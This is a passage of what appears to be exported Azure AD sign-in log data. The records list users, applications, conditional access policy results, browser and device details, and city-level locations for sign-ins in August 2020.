{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d870c1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,52a6664f-09a1-41b6-959f-775d870c1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1176,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:25.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,88879f29-b912-4faf-b37c-f8ae402684d5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577eecce1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,86807d56-c656-4319-9bdc-577eecce1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1177,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:26.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f516ffae-9f78-49a9-9009-3869ee1578ff,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577e18cf1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,86807d56-c656-4319-9bdc-577e18cf1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1178,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:42.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1a1de33-9724-47fa-be54-58201d00ba7e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577e31d11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,86807d56-c656-4319-9bdc-577e31d11300,SigninLogs,Sucess,33.7984581,-84.38828278
+1179,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8954143-cd0b-489c-9a96-50c220b9b027,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",134c741e-1983-4152-9e8f-71886f6e1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,134c741e-1983-4152-9e8f-71886f6e1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1180,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:32.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,432c55f7-7ed4-4dab-96e9-ff522a94743e,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b0d8941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d57fb780-1a14-4a75-9a44-f6b0d8941600,SigninLogs,Sucess,41.90428925,-85.99833679
+1181,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,42196f9c-f7fd-489b-abcf-f0455d8b9344,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c9617081700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,189268ff-d871-4dc4-914e-2c9617081700,SigninLogs,Sucess,33.7984581,-84.38828278
+1182,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,769a5c60-6494-4d80-8950-779e8e8d1bd1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77d635c1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbc0f99c-7bef-40f5-9b26-c77d635c1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1183,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:15.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c0b91de-a6b9-4426-b709-46a99865ba07,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 